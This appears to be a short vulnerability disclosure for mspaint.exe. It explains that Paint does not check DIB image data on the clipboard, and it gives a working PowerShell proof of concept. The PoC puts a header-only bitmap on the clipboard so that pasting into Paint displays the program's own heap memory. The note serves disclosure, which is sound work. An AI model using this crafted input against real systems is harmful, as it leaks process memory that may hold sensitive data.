Summary⌗

mspaint.exe does not properly verify Dib data from the clipboard. Therefore we can craft some Dib data in the clipboard which e.g. suggests a size of 0x100 by 0x100 pixels and contains not more than the Dib header itself. So the acutal image data rendered by mspaint.exe is its own heap data =)

PoC⌗

Run the following code in PowerShell:

$bytes = 40,0,0,0,0,1,0,0,0,1,0,0,1,0,24,0,0,0,0,0,136,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
[System.Windows.Forms.Clipboard]::SetData([System.Windows.Forms.DataFormats]::Dib,[System.IO.MemoryStream]::new($bytes))

Afterwards open mspaint.exe and paste. The result should be the graphical representation of some of mspaints.exe’s heap memory.